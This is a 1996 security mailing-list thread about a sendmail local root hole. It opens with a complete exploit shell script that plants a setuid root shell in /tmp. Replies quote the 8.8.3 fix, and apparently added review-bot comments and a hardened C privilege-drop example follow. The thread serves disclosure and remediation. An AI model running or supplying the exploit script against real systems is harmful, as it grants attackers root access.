Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
similar:

#! /bin/sh
#
#
#   Hi !
#   This is exploit for sendmail smtpd bug
#   (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#   This shell script does a root shell in /tmp directory.
#   If you have any problems with it, drop me a letter.
#   Have fun !
#
#
#                ----------------------
#          ---------------------------------------------
#  ----------------- Dedicated to my beautiful lady ------------------
#          ---------------------------------------------
#                ----------------------
#
#                Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd /tmp/sh
-----BEGIN PGP SIGNED MESSAGE-----

Dawnshadow wrote:
>
> Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
> similar:
[exploit script deleted]

Sendmail 8.8.3 (which is available now) fixes the problem. Get it from
ftp://ftp.sendmail.org/ucb/src/sendmail/
or
ftp://ftp.cert.dfn.de/pub/tools/net/sendmail/

Bye,
  Wolfgang Ley (DFN-CERT)

- --
Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany
Email: ley@cert.dfn.de   Phone: +49 40 5494-2262   Fax: +49 40 5494-2241
PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via
WWW from http://www.cert.dfn.de/~ley/                ...have a nice day

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMpAf+QQmfXmOCknRAQEsRgQAgMs0kJbgjtGi7Gcyzzr6QiIYoEflvgOI
BcLOgP7wMXEIAmzOexqkDp9AjMJK59yA5LTVv8+RKU/csxTHmf0mxd9XBXs7Cfsz
sBUMxt986ZOSrsIZyxa2hRrq+CR1antiYos7sNmMtM9ahIXQVln1u/1uC6Fi4siq
8iLNFjgg1rI=
=BJIb
-----END PGP SIGNATURE-----
Wolfgang Ley says:
> > Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
> > similar:
> [exploit script deleted]
>
> Sendmail 8.8.3 (which is available now) fixes the problem.

NO IT DOESN'T.

I've tried it, and was able to get root consistently with sendmail-8.8.3.
Would anybody outline the code that presumably plugs this hole?
--
Regards,
Uri             uri@watson.ibm.com
-=-=-=-=-=-=-
<Disclaimer>

From mail@mail.redhat.com Wed Nov 20 04:29:25 1996
On Mon, 18 Nov 1996, Wolfgang Ley wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Dawnshadow wrote:
> >
> > Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
> > similar:
> [exploit script deleted]
>
> Sendmail 8.8.3 (which is available now) fixes the problem. Get it from
> ftp://ftp.sendmail.org/ucb/src/sendmail/
> or
> ftp://ftp.cert.dfn.de/pub/tools/net/sendmail/

hi.. rather than us sifting through the code could you tell us how it was
fixed ? does the exec(argv[0]) check to see if the argv[0] = some predefined
sendmail? I honestly cannot think of a time where argv[0] shouldn't equal
the path name (tho I'm sure there must be) thus isn't this a bug in execve
implementations? perhaps the new source only allows a reload of the binary
if the HUP signal comes from uid=0 in which case I would rather like to see
that implementation.

[mod: I haven't had time to look at the code either, but as far as I know
checking the source of a signal is not possible. exec-ing
sendmail_install_location would be an idea. However this wouldn't explain
why some people are still seeing exploit possibilities. -- REW]
-----BEGIN PGP SIGNED MESSAGE-----

Uri Blumenthal wrote:
>
> Wolfgang Ley says:
> > > Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
> > > similar:
> > [exploit script deleted]
> >
> > Sendmail 8.8.3 (which is available now) fixes the problem.
>
> NO IT DOESN'T.
>
> I've tried it, and was able to get root consistently with sendmail-8.8.3.
> Would anybody outline the code that presumably plugs this hole?

Most probably you've forgotten to install the new sendmail binary (and
delete the old one or at least turn off the setuid bit on the old version).
Sendmail 8.8.3 does fix the problem at two independent places. The other
possible problem is that you've forgotten to remove the setuid shell in
/tmp before trying the exploit again.

[mod: Uri has now admitted that this was indeed the case. Sorry for the
stir. -- REW]

Excerpt from the sendmail.8.8.3.patch file:

*** sendmail-8.8.2/src/main.c	Sat Oct 12 17:19:41 1996
- --- sendmail-8.8.3/src/main.c	Sat Nov 16 10:34:25 1996
***************
*** 931,936 ****
- --- 915,933 ----
  		/* fall through ... */

  	  case MD_DAEMON:
+ 		/* check for permissions */
+ 		if (RealUid != 0)
+ 		{
+ #ifdef LOG
+ 			if (LogLevel > 1)
+ 				syslog(LOG_ALERT, "user %d attempted to run daemon",
+ 					RealUid);
+ #endif
+ 			usrerr("Permission denied");
+ 			exit(EX_USAGE);
+ 		}
+ 		vendor_daemon_setup(CurEnv);
+

Which fixes the problem that one can start sendmail in daemon mode, and

***************
*** 1964,1969 ****
- --- 1961,1975 ----
  		syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]);
  #endif
  		releasesignal(SIGHUP);
+ 		if (setgid(RealGid) < 0 || setuid(RealUid) < 0)
+ 		{
+ #ifdef LOG
+ 			if (LogLevel > 0)
+ 				syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m",
+ 					RealUid, RealGid);
+ #endif
+ 			exit(EX_OSERR);
+ 		}
  		execv(SaveArgv[0], (ARGV_T) SaveArgv);

Which resets the userid before restarting.

[mod: In setuid programs, when you try to reset your uid back to the real
uid/gid, ALWAYS first do the group ID and only then the uid. Doing the uid
first, may disable your "right" to alter the gid. Linux may currently have
"saved uids" but don't count on that being portable. I just checked my
approval mailbox, and about 50% of the submitted patches do it in the wrong
order.]

Bye,
  Wolfgang.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMpLi4gQmfXmOCknRAQGW3wQAigJVd+JtGEfBgcmCOL4FTDNiyzu1SgrT
4ZwFBGq+vtdXwh77UtR85q9Agu23DvgGO2BpE+p7PhqiSG7jfHh0tepdmd47q4gt
4Ef0yGlhx2aMpvn2Xx8PoHuGRrUNsdAfgn+w6X0ckhSaVBptlGmCJ0ULXYgKBH4o
v1Mvb6vvvYk=
=uMjU
-----END PGP SIGNATURE-----
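Review bot: the new `if (RealUid != 0)` block at the top of `case MD_DAEMON:` is entered through the `/* fall through ... */` from the preceding case, so whatever mode precedes MD_DAEMON is now refused to non-root invokers as well; if that is intended, the comment should say so, since "check for permissions" does not explain that the point is to keep a caller with a non-zero real uid out of the one mode whose SIGHUP handler re-execs with euid 0. Two smaller points on the same hunk: `RealUid` is passed to a `%d` conversion and should be cast to `int` (uid_t is not necessarily int), and `exit(EX_USAGE)` after `usrerr("Permission denied")` reports a usage error for what is really a permission failure; EX_NOPERM would match the message.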
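Review bot: the drop in the `if (setgid(RealGid) < 0 || setuid(RealUid) < 0)` block is in the right order (gid first, then uid) and bails out with EX_OSERR, but the restart still goes through `execv(SaveArgv[0], (ARGV_T) SaveArgv)`, and SaveArgv[0] is whatever path the invoker started sendmail under; the drop only makes that exec harmless by running it with the real ids. Prefer to execv a compiled-in path and keep SaveArgv for the argument vector only, and read the ids back with getuid()/geteuid()/getgid()/getegid() after the two calls rather than trusting the return values alone, so that a partial drop cannot reach the execv.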
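The two fixes in the quoted patch (refuse daemon mode to a non-zero real uid, and drop back to the real ids before the re-exec) together with the moderator's ordering rule, written out as an added C example. This is not code from the thread or from the sendmail source: the function names, the compiled-in SENDMAIL_PATH macro and the decision to ignore argv[0] as a path are choices made for the example. It goes a step beyond the patch by reading the ids back after the drop and by proving that root cannot be regained, which is the check a reviewer would want before any execv.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Compiled-in location of the only binary we are willing to re-exec.
 * Assumed for this example; the real sendmail build defines no such macro. */
#ifndef SENDMAIL_PATH
#define SENDMAIL_PATH "/usr/sbin/sendmail"
#endif

/* Mirror of the first 8.8.3 hunk: daemon mode is for root only. A setuid-root
 * sendmail started by an ordinary user has euid 0 but a non-zero real uid,
 * and that real uid is what lets the user send it SIGHUP. */
int daemon_mode_allowed(uid_t real_uid)
{
    return real_uid == 0;
}

/* Give up root for good, in the order the moderator insists on: setgid()
 * while still euid 0, then setuid(). Supplementary groups go first, since
 * only root may clear them. Returns 0 on success, -1 with errno set. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) < 0)
        return -1;
    if (setgid(gid) < 0)
        return -1;
    if (setuid(uid) < 0)
        return -1;

    /* Do not trust the return values alone: read the ids back ... */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid) {
        errno = EPERM;
        return -1;
    }
    /* ... and, if we dropped to a non-root uid, prove root is gone. A
     * lingering saved uid of 0 would let this setuid(0) succeed. */
    if (uid != 0 && setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* argv[0] is chosen by whoever started us (the exploit passes "/tmp/smtpd"),
 * so it is never used as a path. The restart always goes to SENDMAIL_PATH;
 * argv0 is only reported when it disagrees. */
const char *restart_target(const char *argv0)
{
    if (argv0 == NULL || strcmp(argv0, SENDMAIL_PATH) != 0)
        fprintf(stderr, "restart: ignoring argv[0] \"%s\", using %s\n",
                argv0 ? argv0 : "(null)", SENDMAIL_PATH);
    return SENDMAIL_PATH;
}

/* The SIGHUP restart path as the patch shapes it: drop to the real ids,
 * then execv(). Unlike the patch, the target path is fixed. The daemon
 * mode check is belt and braces here; a daemon that passed it restarts
 * as root, one that would not pass it never got this far. Returns only
 * on failure. */
int restart_daemon(uid_t real_uid, gid_t real_gid, char *const argv[])
{
    const char *path = restart_target(argv[0]);

    if (!daemon_mode_allowed(real_uid)) {
        errno = EPERM;
        return -1;
    }
    if (drop_privileges(real_uid, real_gid) < 0)
        return -1;
    execv(path, argv);
    return -1;          /* execv only returns on error */
}

int main(int argc, char *argv[])
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();

    (void)argc;
    printf("daemon mode %s for real uid %ld; would re-exec %s\n",
           daemon_mode_allowed(real_uid) ? "allowed" : "refused",
           (long)real_uid, restart_target(argv[0]));
    if (drop_privileges(real_uid, real_gid) < 0) {
        perror("drop_privileges");
        return 1;
    }
    printf("now uid %ld euid %ld gid %ld egid %ld\n", (long)getuid(),
           (long)geteuid(), (long)getgid(), (long)getegid());
    return 0;
}
```

Run unprivileged, `drop_privileges()` is a no-op that still passes the read-back and the `setuid(0)` must-fail check; installed setuid root and started as `/tmp/smtpd`, `restart_target()` refuses the invoker's path and the drop leaves nothing for a re-exec'd binary to `setuid(0)` with, which is exactly the step the exploit's smtpd.c depends on.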
On Tue, 19 Nov 1996, Quantum wrote:
> hi.. rather than us sifting through the code could you tell us how it was
<snip>

Rather than sifting through half a dozen security mailing lists just to make
sure you catch the latest sendmail hole (which seems to pop up once a week)
before you get hacked, I suggest you all give qmail a try:

www.qmail.org

I have installed it on my machine and I am very happy with it. I have not
found it lacking any features that I need. It installed quite cleanly on my
Slackware 3.0 installation. I run a majordomo mailing list with 1,400 people
on it. Qmail *flies* through the mailing list far faster than sendmail could
ever hope to. Qmail has only one little program which runs as root, as
opposed to all of sendmail.

----------
Tracy Reed      http://www.ultraviolet.org
http://www.linux.org - Escape the Gates of Hell